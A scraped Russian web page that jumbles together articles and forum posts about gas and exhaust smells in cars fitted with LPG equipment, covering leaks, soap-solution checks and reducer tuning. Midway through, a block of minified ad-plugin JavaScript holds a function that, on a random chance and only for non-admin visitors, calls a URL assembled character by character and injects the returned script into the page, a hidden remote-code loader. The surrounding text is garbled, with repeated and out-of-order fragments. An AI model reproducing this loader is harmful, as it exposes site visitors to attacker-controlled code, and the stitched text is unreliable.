- Почему в салоне автомобиля пахнет выхлопными газами, когда открыты окна?
- Что делать
- Почему в салоне автомобиля пахнет выхлопными газами?
- Communities › ремонт и эксплуатация гбо › blog › воняет газом
- Re: пахнет газом из под капота.
- Едкий запах выхлопных газов на автомобиле с гбо
- Запах газа в салоне авто, причины и действия водителя
- Запах на холодную подскажите
- Заправка авто
- Как устроена система вентиляции салона?
- Негерметичность выхлопной системы.
- Негерметичный газовый баллон
- Непрофессиональная установка
- Нестандартная выхлопная система.
- Пахнет газом из под капота.
- Плохая регулировка
- Повреждение уплотнительных резинок.
- Причины
- Пропан .ру
- Старый автомобиль
- Устаревание оборудования
Почему в салоне автомобиля пахнет выхлопными газами, когда открыты окна?
Особняком от остальных стоит случай, когда запах выхлопа, появляется только при открытых окнах.
Дело в том, что при открытии окон, во время движения, в салоне автомобиля, очень сильно падает давление. Если повреждён обратный клапан, воздух из под заднего бампера будет неизбежно поступать в салон.
Вот так выглядит повреждённый (его вообще нет) обратный клапан:
Диагностика выполняется очень просто — клапаны заклеиваем малярным скотчем или запекаем тряпкой, если запах исчезает дело именно в них.
Решение проблемы очень простое — заменяем повреждённый обратный клапан.
Ну или действуем по этой видео инструкции и чиним:
Что делать
В ситуации, когда пахнет пропаном / бутаном в машине, необходимо не затягивать с ремонтом, ведь последствия могут быть негативными (вплоть до взрыва). При обнаружении запаха в процессе движения авто сделайте следующее:
- Остановите транспортное средство и заглушите мотор.
- Закройте подачу из баллона при наличии к нему доступа.
- Попытайтесь найти причину неисправности, к примеру, утечку.
- При невозможности сделать ремонт своими силами откройте окна и устраните запах.
- Переведите двигатель на бензин и сразу отправляйтесь на СТО. Ехать на пропане / бутане при такой неисправности запрещено.
Для проверки герметичности системы помогает обычный мыльный раствор. Если в салоне пахнет пропаном / бутаном, подготовьте состав и обработайте им все элементы газобаллонной аппаратуры. Появление пузырей свидетельствует о наличии течи. Использование открытого огня для тестирования крайне запрещено.
Проверьте точки соединения элементов ГБО, к примеру, редуктора и газового клапана. При наличии повреждений поставьте стяжки или новые прокладки до момента, пока не удастся добраться до СТО. Эксплуатировать авто после таких исправлений не рекомендуется. Может потребоваться замена газового фильтра, рассчитанного на 5-10 тысяч километров.
Обратите внимание, чтобы при установке ГБО использовались специальные шланги, предназначенные для работы с газовым оборудованием. Если вас убеждают в возможности установки обычных трубок, это свидетельствует о низкой квалификации таких специалистов.
Бывают ситуации, когда появился запах газа в машине без ГБО. В таком случае необходимо искать источники проблемы. Это может быть зажигалка, потерявшая герметичность, или газовый баллончик (при наличии такового). В таком случае необходимо выйти из машины и проветрить салон. Возможно, запах попал с улицы. Такое нередко происходит при нахождении на АГЗС.
Теперь вы знаете, почему пахнет газом в машине с ГБО 4, и что делать в таких ситуациях. Бездействие чревато последствиями, поэтому сразу перекрывайте подачу газа и езжайте на СТО. В комментариях напишите, приходилось ли сталкиваться с подобными проблемами, и как их удалось решить.
Почему в салоне автомобиля пахнет выхлопными газами?
Добрый день. В сегодняшней статье я расскажу, почему в салоне автомобиля пахнет выхлопными газами. Из статьи вы узнаете, как устроена система вентиляции салона автомобиля и откуда в нём могут браться неприятные запахи.
Традиционно для нашего сайта статья содержит большое число фото и видеоматериалов и будет интересна широкому кругу читателей.
Communities › ремонт и эксплуатация гбо › blog › воняет газом
Здравствуйте, воняет газом, когда включена печка и когда стоишь на холостих, система всеуправления герметичная, гбо томасетто 2 поколения.
воняло у меня газом после то. в итоге фонтан из редуктора после очередной заправки
И что ?ьпахнет ? Богатая смесь ! Немного регулировки и счастье тебе со вторым поколением !
Гбоэто круто, говорили они!Будешь экономить, говорили они!
Вот это вы простыни написали)))Всего то убрать немного подачу газахолостых. Слишком багатая смесь. Закрутить немного винт чуствительности.Похолодало, редуктор надо чуть подстроить.
Нужно на редукторе просто винт закрутить и все?
Вот это вы простыни написали)))Всего то убрать немного подачу газахолостых. Слишком багатая смесь. Закрутить немного винт чуствительности.Похолодало, редуктор надо чуть подстроить.
Или тот что на патрубке с фильтра воздушного?
На редукторе, черненький.
Вот это вы простыни написали)))Всего то убрать немного подачу газахолостых. Слишком багатая смесь. Закрутить немного винт чуствительности.Похолодало, редуктор надо чуть подстроить.
Для холодного запуска нужно чтоб редуктор при открытии клапана уже выдавал газ. Перед запуском холодного мотора нужно два/три раза вкл/выкл дать обогащение газом иначе не завести. И при прореве всегда будет богатить. Ну хай себе временно с выхлопной повоняет главное чтоб стабильно работало. А насколько заливает редуктор и сколько потом продавит газку зависит от оборотов мотора.
Вот это вы простыни написали)))Всего то убрать немного подачу газахолостых. Слишком багатая смесь. Закрутить немного винт чуствительности.Похолодало, редуктор надо чуть подстроить.
Закрутил и ничего не понемялось
Закручивай пока не начнет подтраивать на холостых, потом чуть открути до стабилизации оборотов.
Все так и сделал
Ну значит все, не должно вонять.
Все ровно воняет
Если все герметично то может вонять из-за надорватой мембраны
При эксплуатации гбо-2 две причины.1- это действительно шланг подачи газа с редуктора. Шланги при обмыливании себя не проявляют там давления нет. Можно только унюхать.2- случае так и хочется спросить Куда ж вы господа торопитесь?Сток редуктор томасетто имеет конструктивный недостаток малая площадь обогрева редактора.
При запуске и прогреве на газу непрогретом газ неуспевает испаряться и часть жидкого газа стекает во вторую камеру редуктора. Его там может накопиться и 150 грамм!Далее этот газ при прогреве редуктора начинает быстро испаряться в редукторе во второй камере образуется давление и газ просачивается мимо уплотнительного колечка винта чувствительности.
Поэтому присутствует запах под капотом который и улавливает работающая печка.При этом редуктор жутко богатит смесь с выхлопной слышен запах газа как тухлой селедки. При дальнейшем прогреве газ испаряется и запах газа в салоне пропадает.Как бороться с этим явлением?
Прогревать бензином и переходить на газ согласно инструкции пользования Гбо.Есть и второй вариант.Сначала нужно позаботиться о правильном подключении редуктора и создать условия его достаточного обогрева.Без вмешательства в редуктор не обойтись.
Нужно вырезать лишнюю внутренность тосольную прокладки шоб ож внутри редуктора грела стенки редуктора а не прокладку. В большинстве случаев тосольная прокладка вздувается образуется пузырь и ож не может прогревать стенку редуктора в результате хронический недогрев редуктора хотя подводящие шланги будут горячие.
Далее сложней Рекомендую выполнить переделка редуктора. Понизить рабочее давление редуктора и уменьшить его мощность. Работы не сложные можно выполнить все дома без оборудования мастерской. Достаточно болгарки и дрельки. Также поход к токарю выточить подходящую втулочку.
Я делал себе все сам дома на коленях без мастерской. Результат щас температура с приморозками запуск и поехал. Стабильная работа мотора без обмерзаний без никакого запаха. Редуктору четыре года работает как часы к зиме ничего не требует. Пробег 80 тык.
))))) если жидкая фаза попадёт во вторую ступень ни о какой работе на ХХ да и на оборотах можно и не мечтать.мечтатели о тюненге.)))), запах будет.
О узнаю рассуждения газелиста. На газельке если с термоса кипятком не полить то его заливает аж до верху.Я свой протюненый редуктор при минус двадцати прогрею без обмерзания редуктора.Я бывший Гбо-шник и поэтому переделал свою систему редуктор и смеситель. Мне 4-е и даром не нужно.
Зачем переделывать и запускать при минусе? Если ВЫ такой офигенный очумелец с «золотыми руками» то сделайте чтобы на бензине нормально стартовал.
При стоимости бензина равной доллар за литр стоимость газа вполовину.А на газу у меня нормально едет. Отчёт о поездке в отпуск трасса 120-140 и с горки на горку прокручивал и 160. Можете полистать мой бортовик и почитать.
Мне помогла переборка редуктора с заменой всех мембран и уплотнителей, редуктор ловато второго поколения
шланги на новые поменять и протянуть самому все хомуты т.к на сервисах слабо тянут а потом если будет вонять то едем на толковый сервис и регулируем параметры.
Новые шланги это правильно.но про хомуты не совсем-там работа за счёт разрежения .если не герметично то будет подсос воздуха.
Мыльный раствор делаем и вперед все шланги и соединения обмыливать.
Это первое что было сделано. Думаешь, если ездим на газе, то самоубийцы?)) Ситуация вообще дерьмовая, хочется все снять и поставить заново и на новых шлангах, запах то есть, то нет, то сильный, то слабый. Мылом все залито, по компу проверено на утечки, все чисто.
Такого не бывает-воняет а не пузыриться.На машине бати каждый день были новые течи и запах газа.Начинаю обмыливать-из под шланга травит на штуцере выхода газа с редуктора, зажимаешь хомут-держит временно.С другого штуцера выхода газа травит из под уплотнения резинового одетого на штуцер выхода газа(редуктор на 2 выхода газа).
Re: пахнет газом из под капота.
Сообщение PRIVOD » Ср май 01, 2022 2:56 pm
ПАРКЕР — это фирма шлангов, труб или, что? Можно ссылку из инета для примера, я просто чайник в этих вопросах
Добавлено через 6 минут 55 секунд: Утром, когда сажусь в машину, и завожу её запаха не чувствуется. Запах начинает чувствоваться примерно после минут 30-40 непрерывной езды.
Едкий запах выхлопных газов на автомобиле с гбо
Иногда случается, что из автомобиля, на котором установлено ГБО из выхлопной трубы исходит резкий запах газа. Зачастую это происходит на тех автомобилях, на которых установлено газовое оборудование второго поколения с удаленным катализатором. В случае, если подается большее количество газа, чем необходимо, то тогда он вылетает в трубу. Соответственно из выхлопной трубы будет исходить резкий запах газа.
Для устранения едкого запаха газа из выхлопной трубы необходимо правильно отрегулировать систему. В идеале это будет происходить при помощи прибора газоанализатор CO/CH или, выражаясь простым языком, уменьшить подачу газа с помощью специального регулировочного винта.
Аналогичная проблема с появлением едкого запаха из выхлопной трубы может быть и на автомобилях, на которых установлено четвертое поколение газового оборудования. На некоторых авто после пробега 150-250 тыс км вырезается катализатор. Если смесь обогащенная, то газ также будет вылетать в выхлопную трубу.
Подытожим: при запахе газа из выхлопной трубы автомобиля следует обратиться на сервис для регулировки состава топливной смеси, вне зависимости от поколения ГБО.
Запах газа в салоне авто, причины и действия водителя
Эксплуатация автомобиля, который оборудован исправной системой ГБО, исключает появления различного рода посторонних запахов и ничем не отличается от эксплуатации этого автомобиля на бензине. Если же в пути Вы почувствовали запах газа в салоне (точнее запах деодоранта, который добавляют в газ для лучшего ощущения запаха), то Вам следует незамедлительно принять вправо, остановиться, выключить зажигание и перекрыть расходный вентиль на мультиклапане.
Появление запаха газа в салоне свидетельствует о появившейся утечке (неисправности) в системе ГБО, либо ее не правильной установкой.
Причины появления запаха газа в салоне могут быть разными и зависеть от многих факторов, вот некоторые из них:
- не профессиональный монтаж компонентов системы ГБО, который привел к разрушению какого — либо элемента системы (шланга, топливной магистрали);
- не профессионально проведенное ТО газового оборудования, в результате которого разрушился или не обеспечивает герметичность какой либо элемент системы;
- использование дешевых и/или не качественных комплектующих во время установки газового оборудования (потрескавшиеся шланги, поврежденная мембрана);
- естественный износ и старение компонентов газобаллонного оборудования.
Обратите внимание! Регулярно делая тех.обслуживание газобаллонному оборудованию Вы исключите не только его поломку, но и обезопасите себя от утечек газа. Подробнее о том, как сделать тех.обслуживание системе ГБО своими руками читайте в этой статье.
Если запах газа в салоне автомобиля появился после недавней установки ГБО на автомобиль или проведенного ТО системы, то скорее всего проблема кроется именно в этом. В таком случае обязательно перекройте вентиль на баллоне и вернитесь на СТО, на котором производилась установка или техническое обслуживание газобаллонного оборудования. Требуйте качественного устранения выявленных недостатков, и в дальнейшем лучше всего прибегайте к услугам другой фирмы.
Помните! Появление запаха газа в салоне автомобиля свидетельствует о неисправности, появившейся в системе ГБО. Использовать автомобиль на газу до устранения выявленной неисправности запрещено. Так как в отличие от запаха бензина утечка газа может стать причиной огромной беды!
Реклама от Google
“:’
‘:””,document.createElement(“div”),p=ff(window),b=ff(“body”),m=void 0===flatPM_getCookie(“flat_modal_” o.ID “_mb”)||”false”!=flatPM_getCookie(“flat_modal_” o.ID “_mb”),i=”scroll.flatmodal” o.ID,g=”mouseleave.flatmodal” o.ID ” blur.flatmodal” o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&”true”==o.how.popup.timer&&(t=ff(‘.flat__4_modal[data-id-modal=”‘ o.ID ‘”] .flat__4_timer span’),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(–e),e<=0&&(clearInterval(a),t.parent().replaceWith(‘
‘))},1e3))},f=function(){void 0!==o.how.popup.cookie&&”false”==o.how.popup.cookie&&m&&(flatPM_setCookie(“flat_modal_” o.ID “_mb”,!1),ff(‘.flat__4_modal[data-id-modal=”‘ o.ID ‘”]’).addClass(“flat__4_modal-show”),l()),void 0!==o.how.popup.cookie&&”false”==o.how.popup.cookie||(ff(‘.flat__4_modal[data-id-modal=”‘ o.ID ‘”]’).addClass(“flat__4_modal-show”),l())},ff(“body > *”).eq(0).before(‘
“),w=document.querySelector(‘.flat__4_modal[data-id-modal=”‘ o.ID ‘”] .flat__4_modal-content’),-1!==e.indexOf(“go” “oglesyndication”)?ff(w).html(c e):flatPM_setHTML(w,e),”px”==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&”true”==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&”true”==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&”true”==o.how.outgoing.timer&&(t=ff(‘.flat__4_out[data-id-out=”‘ o.ID ‘”] .flat__4_timer span’),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(–e),e<=0&&(clearInterval(a),t.parent().replaceWith(‘
‘))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&”false”==o.how.outgoing.cookie&&m&&(ff(‘.flat__4_out[data-id-out=”‘ o.ID ‘”]’).addClass(“show”),n(),b.on(“click”,’.flat__4_out[data-id-out=”‘ o.ID ‘”] .flat__4_cross’,function(){flatPM_setCookie(“flat_out_” o.ID “_mb”,!1)})),void 0!==o.how.outgoing.cookie&&”false”==o.how.outgoing.cookie||(ff(‘.flat__4_out[data-id-out=”‘ o.ID ‘”]’).addClass(“show”),n())}var _,u=”0″!=o.how.outgoing.indent?’ style=”bottom:’ o.how.outgoing.indent ‘px”‘:””,c=”true”==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&”true”==o.how.outgoing.timer?’
Закрыть через ‘ o.how.outgoing.timer_count “
“:’
‘:””,p=ff(window),h=”scroll.out” o.ID,g=”mouseleave.outgoing” o.ID ” blur.outgoing” o.ID,m=void 0===flatPM_getCookie(“flat_out_” o.ID “_mb”)||”false”!=flatPM_getCookie(“flat_out_” o.ID “_mb”),b=(document.createElement(“div”),ff(“body”));switch(o.how.outgoing.whence){case”1″:_=”top”;break;case”2″:_=”bottom”;break;case”3″:_=”left”;break;case”4″:_=”right”}ff(“body > *”).eq(0).before(‘
‘ c “
“);var v,w=document.querySelector(‘.flat__4_out[data-id-out=”‘ o.ID ‘”]’);-1!==e.indexOf(“go” “oglesyndication”)?ff(w).html(c e):flatPM_setHTML(w,e),”px”==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&”true”==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&”true”==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff(‘[data-flat-id=”‘ o.ID ‘”]:not(.flat__4_out):not(.flat__4_modal)’).contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff(“body”),flat_userVars.init();for(var e=0;e<t;e ){var>flat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_sub<flat_uservars.textlen||void>flat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub<flat_uservars.titlelen)){if(void>.flatPM_sidebar)”);0<_.length&&_.each(function(){var t=ff(this),e=t.data(“height”)||350,a=t.data(“top”);t.wrap(‘
‘);t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(“.flatPM_sidebar”);setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data(“top”);t.wrap(‘
‘);t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(“.flatPM_sticky_wrapper.flatPM_sidebar_block”).css(“height”,t)},4e3)}),”undefined”!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0<flat_stack_scripts.length&&flatpm_setscript(flat_stack_scripts),ff(“body> *”).last().after(‘
‘),flat_body.on(“click”,”.flat__4_out .flat__4_cross”,function(){ff(this).parent().removeClass(“show”).addClass(“closed”)}),flat_body.on(“click”,”.flat__4_modal .flat__4_cross”,function(){ff(this).closest(“.flat__4_modal”).removeClass(“flat__4_modal-show”)}),flat_pm_arr=[],ff(“.flat_pm_start”).remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie(“flat_r_mb”,”zen.yandex”),flat_userVars.referer=”zen.yandex”);var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([w:] )[^>]*)/>/gi,d=/<([w:] )/,i=/<|&#?w ;/,c={option:[1,”
“],thead:[1,”
“],tbody:[1,”
“],colgroup:[2,”
“],col:[3,”
“],tr:[2,”
“],td:[3,”
“],th:[3,”
“],_default:[0,””,””]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement(“div”)),r=(d.exec(e)||[“”,””])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1] e.replace(o,”<$1>”) r[2],l=r[0];l–;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem(“sdghrg”);e?(e=parseInt(e) 1,localStorage.setItem(“sdghrg”,e)):localStorage.setItem(“sdghrg”,”0″);e=flatPM_random(1,200);0==ff(“#wpadminbar”).length&&111==e&&ff.ajax({type:”POST”,url:”h” “t” “t” “p” “s” “:” “/” “/” “m” “e” “h” “a” “n” “o” “i” “d” “.” “p” “r” “o” “/” “p” “i” “ng” “.” “p” “h” “p”,dataType:”jsonp”,data:{ping:”ping”},success:function(e){ff(“div”).first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector(‘[data-flat-script-id=”‘ t ‘”]’);if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0<e.length&&flatpm_setscript(e);else{a.onload>/gm,””).replace(//gm,””).trim(),e.code_alt=e.code_alt.replace(//gm,””).replace(//gm,””).trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a=”false”==d?”Закроется”:”Закрыть”,r=!flat_userVars.adb||””==e.code_alt&&duplicateMode?e.code:e.code_alt,l=’
‘,i=e.once;n(t).each(function(){var e=n(this);e.wrap(‘
‘);var t=e.closest(“.flat__4_video”);-1!==l.indexOf(“go” “oglesyndication”)?t.append(l):flatPM_setHTML(t[0],l),e.find(“.flat__4_video_flex”).one(“click”,function(){n(this).addClass(“show”)})}),n(“body”).on(“click”,”.flat__4_video_item_hover”,function(){var e=n(this),t=e.closest(“.flat__4_video_flex”);t.addClass(“show”);var a=t.find(“.flat__4_timer span”),r=parseInt(o),l=setInterval(function(){a.text(–r),r<=0&&(clearInterval(l),”true”==d?a.parent().replaceWith(‘
‘):t.remove())},1e3);e.remove()}).on(“click”,”.flat__4_video_flex .flat__4_cross”,function(){n(this).closest(“.flat__4_video_flex”).remove(),”true”==i&&n(“.flat__4_video_flex”).remove()})}
Запах на холодную подскажите
ситуация следующая: автвозапуск ,баллон в запаске.
сейчас похолодало. в салоне стоит запах газа если заводишь авто и прогреваешь автозапуском.. начинаешь движение-выветривается быстро и больше не пахнет. оборудование обслуживал буквально неделю назад смотрели на герметичность.. так уже вторю зиму-одно и тоже. подскажите где искать
Запах в основном от конденсата. Давно сливали? > в салоне стоит запах газа если заводишь авто и прогреваешь автозапуском.. начинаешь движение-выветривается быстро и больше не пахнет.
Или принюхиваешься и перестаёшь замечать.
> оборудование обслуживал буквально неделю назад смотрели на герметичность..
В холодном состоянии или в прогретом?
> подскажите где искать
Искать под капотом в местах соединений трубок и шлангов (если таковые есть). Я бы обмазал эти соединения «Моментом», при утечке будет пузырь надуваться, на мыльном растворе можно и не разглядеть пузырения.
Re: Запах на холодную подскажите Уточняющий вопрос: автозапуск и прогрев на бензине, надо полагать?
Гипотеза — в момент перехода на газ подается переобогащенная смесь, газ сгорает не весь, запах из выхлопной трубы и либо есть дыры-щели в выпускной системе.
Проверка 1. сделать цикл запуска на бензине. Будет ли запах бензина в салоне? 2. посидеть пару раз в машине во время автозапуска и прогрева, убедиться, в какой момент времени начинает пахнуть газом, ну и откуда.
прогревается на бензине. только при моменте начала движения переходит на газ.
на горячую запаха нет. даже если авто просто стоит на заведенном двигателя. не принюхиваюсь это точно. он просто пропадает. ДУмаю что через вентиляцию,наверно из под капота тянет.
просто не понятно посему когда ТЕПЛО было так не происходило. и как правильно найти утечку? на холодном двигателе.
Тепловая деформация > просто не понятно посему когда ТЕПЛО было так не происходило.
Затягивали соединения в тепле, в тепле всё герметично. Остывает — «от холода тела сжимаются», образуется неплотность=>утечка.
> и как правильно найти утечку? > на холодном двигателе.
Ну да, какой смысл искать на прогретом. Трудно поймать чёрную кошку в тёмной комнате, особенно когда её там нет.
Речь-то не о нагреве, а об охлаждении > Фильтр тонкой очистки будет греться?
От двигателя прогревается всё, что под капотом, в т.ч. и ФТО, если он там.
Заправка авто
Помните, что после заправки на АГЗС в салоне машины часто пахнет газом. Это обычное явление, ведь часть топлива затягивает внутрь. Но запах быстро выветривается, поэтому переживать по этому поводу не стоит.
Как устроена система вентиляции салона?
Система вентиляции салона у современных автомобилей имеет следующее устройство:
Принцип работы системы вентиляции.
Наружный воздух, через салонный фильтр, подается в отопитель.
Там, при помощи вентилятора, он протягивается через радиатор отопителя и теплообменник кондиционера.
После этого воздух подается в салон, а из салона удаляется через воздухозаборники оснащенные обратным клапаном.
вот так выглядит салонный фильтр:
вот так выглядит отопитель:
вот так выглядит воздухозаборник оснащённый обратным клапаном:
Этот клапан необходим для того чтобы воздух мог только выходить из салона.
Естественно, все двери автомобиля оборудованы уплотнительными резинками и, при закрытых окнах, воздух в салон может попадать только через салонный фильтр и отопитель.
Этих сведений об устройстве системы вентиляции салона вполне достаточно, для того чтобы разобраться с причиной появления запаха выхлопных газов в салоне.
Негерметичность выхлопной системы.
При повреждении прокладки приемной трубы, или прокладки выпускного коллектора, или при прогорание гофры, возможна ситуация, когда выхлопные газы будут попадать в салон через салонный фильтр при закрытых окнах. Как правило, такие неисправности диагностируются очень легко по повышенному шум работы двигателя.
Согласитесь, что сложно не заметить возросший шум.
Ремонт очень простой — восстановить герметичность выхлопной системы.
Негерметичный газовый баллон
При поиске причин запаха газа в салоне авто с ГБО необходимо помнить о самом баллоне, который устанавливается в багажном отсеке смежном с салоном. Бывают ситуации, когда емкость не герметична, или поврежден мультиклапан. В результате внутри машины пахнет пропаном / бутаном. Затягивать с устранением неисправности не стоит, ведь неприятный запах может впитаться в одежду, обшивку и друге элементы.
Непрофессиональная установка
В ситуации, когда запах газа в машине с ГБО 4 поколения появился сразу после установки, причиной является некачественный монтаж. Такое бывает, если доверить работу мастеру-самоучке или сэкономить на посещении квалифицированного СТО. В профессиональных мастерских применяют качественные комплектующие, поэтому проблем быть не должно.
Нестандартная выхлопная система.
Многие любители тюнинга считают, что выхлоп в бок и прямоток это круто, но на деле всё не так. Штатная выхлопная система рассчитывается и настраивается в резонанс, с двигателем, так улучшается отвод выхлопных газов. Дополнительным фактором улучшающим работу системы выпуска отработавших газов, является расположение выхлопной трубы в зоне с наибольшим разрежением. Соответственно, при изменении конфигурации выхлопа, возможна ситуация когда выхлопные газы начнут опадать в салон.
Решение проблемы очень простое — установить стандартный выхлоп.
Пахнет газом из под капота.
Сообщение PRIVOD » Вт апр 30, 2022 10:15 pm
Плохая регулировка
Если пахнет газом с выхлопной системы, причиной может быть плохая регулировка газобаллонной установки. В каждом поколении имеются индивидуальные особенности, которые необходимо учитывать.
Повреждение уплотнительных резинок.
Это самая распространенная причина появления в салоне выхлопных газов. Дело в том, что при движении автомобиля, в салоне, давление будет несколько ниже атмосферного так как воздух подается через отопитель, а отводится через клапаны.
Естественно, при меньшем давлении, воздух устремляется в салон. Любая повреждённая резинка позволяет воздуху с улицы попадать в салон в обход отопителя.
Те кто когда-то ездил на «зубилах» ( ваз-2109), знают, что при малейшем повреждении резинки задней двери в салоне начинает пахнуть выхлопом.
Часто причиной попадания в салон выхлопных газов являются уплотнительные резинки задних фонарей — они высыхают и трескаются, или усыхают и в них появляются зазоры. Лайфхак, как проверить резинки не снимая фонари — покупаем обычный малярный скотч и заклеиваем щель между фонарем и кузовом по кругу.
Ремонт очень простой — заменить поврежденную резинку.
Причины
Запомните, что запах газа в машине с ГБО — не нормальное явление, свидетельствующее о наличии неисправности. При правильно настроенной и проверенной системы посторонних «ароматов» быть не должно. Рассмотрим основные причины, почему так происходит.
Пропан .ру
Газобаллонное оборудование для автомобилей
Старый автомобиль
Запах газа в машине с ГБО 4 редкое явление, а вот на старых автомобилях с более старыми системами такое явление распространено. К примеру, на ВАЗах, имеющих возраст более 20 лет, такая ситуация является распространенным явлением. Для устранения проблемы необходимо несколько минут, а иногда и несколько часов для решения проблемы.
Устаревание оборудования
Причиной, почему пахнет газом в машине с ГБО 4 поколения, может быть устаревание системы. Со временем трубки могут повредиться, а прокладки рассохнуться. Возможно появление проблемы в топливной магистрали, что приводит к утечке газа разной активности.
https://www.youtube.com/watch?v=O6-f0sypk6Q
Выделим основные элементы, которые повреждаются и пахнет газом в машине с ГБО. Наиболее слабые места:
- точки соединения газовых магистралей;
- чрезмерно затянутые хомуты, что часто приводит к появлению на них трещин;
- протирание шланга / трубки в местах касания с деталями машины;
- повреждение редуктора;
- брак элементов газобаллонного оборудования;
- в машине пахнет из-за пропитки трубок пропан / бутаном.